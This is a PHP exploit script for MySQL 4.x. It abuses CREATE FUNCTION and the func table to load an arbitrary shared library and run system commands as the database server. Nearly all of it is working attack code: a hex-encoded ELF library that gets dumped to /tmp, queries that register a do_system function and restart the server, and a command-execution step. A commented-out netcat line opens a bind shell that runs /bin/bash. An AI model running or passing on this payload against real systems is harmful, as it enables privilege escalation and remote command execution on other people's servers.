Mysql 4.x "CREATE FUNCTION" Arbitrary library injection Exploit<?
/*************************************
** Mysql CREATE FUNCTION func table arbitrary library injection
**
** Author: Stefano Di Paola
** Vulnerable: Mysql <= 4.0.23, 4.1.10
** Type of Vulnerability: Local/Remote Privileges Escalation - input validation
** Tested On : Mandrake 10.1 /Debian Sarge
** Vendor Status: Notified on March 2005
**
** Copyright 2005 Stefano Di Paola (stefano.dipaola@wisec.it)
**
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
**
*************************************
*/
// this is the MySql root password.
$pass='useyoupasswordhere';
function mysql_create_db($db,$link)
{
$query="CREATE database $db;";
return mysql_query($query, $link) ;
}
// the library in little endian hex. (from NGS's Hackproofing_MySql
// http://www.nextgenss.com/papers/HackproofingMySQL.pdf )
$solib="0x7f454c4601010100000000000000000003000300010000002006000034000000340a00000000 \
00003400200004002800160015000100000000000000000000000000000094070000940700000500000000 \
1000000100000094070000941700009417000004010000080100000600000000100000020000009c070000 \
9c1700009c170000c8000000c8000000060000000400000051e57464000000000000000000000000000000 \
00000000000600000004000000250000002800000000000000260000000000000000000000000000000000 \
00000000000022000000270000000000000000000000000000000000000000000000000000000000000000 \
00000000000000230000001e00000000000000000000000000000000000000000000002000000000000000 \
00000000000000000000000021000000250000000000000000000000000000002400000000000000000000 \
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
000000001c000000000000001f000000000000001d00000000000000000000000000000000000000000000 \
0000000000b4000000000000000300010000000000f0010000000000000300020000000000700400000000 \
00000300030000000000100500000000000003000400000000006005000000000000030005000000000090 \
050000000000000300060000000000c0050000000000000300070000000000d00500000000000003000800 \
00000000e8050000000000000300090000000000200600000000000003000a000000000074070000000000 \
0003000b0000000000900700000000000003000c0000000000941700000000000003000d00000000009c17 \
00000000000003000e0000000000641800000000000003000f00000000006c180000000000000300100000 \
00000074180000000000000300110000000000781800000000000003001200000000009818000000000000 \
03001300000000000000000000000000030014000000000000000000000000000300150000000000000000 \
00000000000300160000000000000000000000000003001700000000000000000000000000030018000000 \
000000000000000000000300190000000000000000000000000003001a0000000000000000000000000003 \
001b00010000009c170000000000001100f1ff610000000000000076000000120000002f000000d0050000 \
00000000120008007900000098180000000000001000f1ff35000000740700000000000012000b003b0000 \
000000000097000000220000005e000000080700003600000012000a007200000098180000000000001000 \
f1ff0a00000078180000000000001100f1ff850000009c180000000000001000f1ff4a0000000000000000 \
0000002000000020000000000000000000000020000000005f44594e414d4943005f474c4f42414c5f4f46 \
465345545f5441424c455f005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f5f6378 \
615f66696e616c697a65005f4a765f5265676973746572436c617373657300646f5f73797374656d006c69 \
62632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e33 \
00474c4942435f322e30000000000000000000000000000000000000000000000000000000000000000000 \
00000000000000000000000000000000000000000000000001000200010001000100030001000100010001 \
000000000001000200680000001000000000000000731f6909000003008a000000100000001069690d0000 \
02009600000000000000941700000800000098170000080000002b070000021d00008c1800000621000090 \
180000062600009418000006270000841800000721000088180000072600005589e583ec08e845000000e8 \
e0000000e85b010000c9c300ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffff \
ffffa3100000006808000000e9d0ffffff00000000000000005589e553e8000000005b81c34f120000528b \
831c00000085c07402ffd0585bc9c39090909090909090909090909090905589e553e8000000005b81c31f \
1200005180bb200000000075348b931400000085d2752f8b8320ffffff8b1085d2741783c004898320ffff \
ffffd28b8320ffffff8b1085d275e9c68320000000018b5dfcc9c383ec0c8b831cffffff50e846ffffff83 \
c410ebbd89f68dbc27000000005589e553e8000000005b81c3af110000508b83fcffffff85c0740a8b8318 \
00000085c0750b8b5dfcc9c38db60000000083ec0c8d83fcffffff50e809ffffff83c4108b5dfcc9c39055 \
89e583ec088b450c8338017409c745fc00000000eb1a83ec0c8b450c8b4008ff30e8fcffffff83c410c745 \
fc000000008b45fcc9c390905589e55653e8000000005b81c32e1100008d83f0ffffff8d70fc8b40fc83f8 \
ff740c83ee04ffd08b0683f8ff75f45b5e5dc390905589e553e8000000005b81c3fb10000050e8c6feffff \
595bc9c3000000000000941700007018000001000000680000000c000000d00500000d0000007407000004 \
000000b4000000050000007004000006000000f00100000a000000a00000000b0000001000000003000000 \
781800000200000010000000140000001100000017000000c0050000110000009005000012000000300000 \
0013000000080000001600000000000000feffff6f60050000ffffff6f01000000f0ffff6f10050000faff \
ff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000 \
000000ffffffff00000000ffffffff00000000000000009c1700000000000000000000fe0500000e060000 \
000000000000000000000000004743433a2028474e552920332e332e3120284d616e6472616b65204c696e \
757820392e3220332e332e312d316d646b2900004743433a2028474e552920332e332e3120284d616e6472 \
616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e552920332e332e31 \
20284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e55 \
2920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743 \
433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d316d \
646b2900002e7368737472746162002e68617368002e64796e73796d002e64796e737472002e676e752e76 \
657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e \
6974002e74657874002e66696e69002e65685f6672616d65002e64617461002e64796e616d6963002e6374 \
6f7273002e64746f7273002e6a6372002e676f74002e627373002e636f6d6d656e74000000000000000000 \
000000000000000000000000000000000000000000000000000000000000000000000b0000000500000002 \
000000b4000000b40000003c01000002000000000000000400000004000000110000000b00000002000000 \
f0010000f001000080020000030000001c0000000400000010000000190000000300000002000000700400 \
0070040000a00000000000000000000000010000000000000021000000ffffff6f02000000100500001005 \
000050000000020000000000000002000000020000002e000000feffff6f02000000600500006005000030 \
000000030000000100000004000000000000003d0000000900000002000000900500009005000030000000 \
02000000000000000400000008000000460000000900000002000000c0050000c005000010000000020000 \
000900000004000000080000004f0000000100000006000000d0050000d005000017000000000000000000 \
000004000000000000004a0000000100000006000000e8050000e805000030000000000000000000000004 \
00000004000000550000000100000006000000200600002006000054010000000000000000000010000000 \
000000005b000000010000000600000074070000740700001a000000000000000000000004000000000000 \
00610000000100000002000000900700009007000004000000000000000000000004000000000000006b00 \
00000100000003000000941700009407000008000000000000000000000004000000000000007100000006 \
000000030000009c1700009c070000c8000000030000000000000004000000080000007a00000001000000 \
03000000641800006408000008000000000000000000000004000000000000008100000001000000030000 \
006c1800006c08000008000000000000000000000004000000000000008800000001000000030000007418 \
00007408000004000000000000000000000004000000000000008d00000001000000030000007818000078 \
08000020000000000000000000000004000000040000009200000008000000030000009818000098080000 \
04000000000000000000000004000000000000009700000001000000000000000000000098080000fa0000 \
00000000000000000001000000000000000100000003000000000000000000000092090000a00000000000 \
0000000000000100000000000000";
$link=mysql_connect("127.0.0.1","root",$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo "Connected successfully as root\n";
echo "creating db for lib\n";
mysql_create_db('my_db',$link) or print ('cannot create my_db db, sorry!');
echo "done....\n";
echo "selecting db for lib\n";
mysql_select_db('my_db') or print ('cannot use my_db db, sorry!');
echo "done....\n";
echo "creating blob table for lib\n";
$query="CREATE TABLE blob_tab (blob_col BLOB);";
$result = mysql_query($query, $link) or print("cannot create blob table for lib\n");
echo "done....\n";
echo "inserting blob table for lib\n";
$query="INSERT into blob_tab values (CONVERT($solib,CHAR));";
$result = mysql_query($query, $link) or print("cannot insert blob for lib\n");
echo "done....\n";
echo "dumping lib in /tmp/libso.so.0...\n";
$query="SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0';";
$result = mysql_query($query, $link) or print("cannot dump lib\n");
echo " done....\n";
mysql_select_db('mysql') or die ('cannot use mysql db, sorry!');
echo "sending lib....\n";
$query="insert into func (name,dl) values ('do_system','/tmp/libso.so.0');";
$result = mysql_query($query, $link);
echo "done....\n";
echo "Creating exit function to restart server\n";
$query="create function exit returns integer soname 'libc.so.6';";
$result = mysql_query($query, $link) or print ("cannot create exit, sorry!\n");
echo "done....\n";
echo "Selecting exit function\n";
$query="select exit();";
$result = mysql_query($query, $link);
echo "done!\nWaiting for server to restart\n";
sleep(1);
$link=mysql_connect("127.0.0.1","root",$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo "Connected to MySql server again...\n";
//$cmd ='/usr/sbin/nc -l -p 8000 -e /bin/bash';
$cmd ='id >/tmp/id';
echo "Sending Command...$cmd\n";
$query="select do_system('$cmd');";
$result = mysql_query($query, $link);
echo "done!\n";
echo "Now use your fav shell and ls /tmp/id -l \n";
mysql_close($link);
?>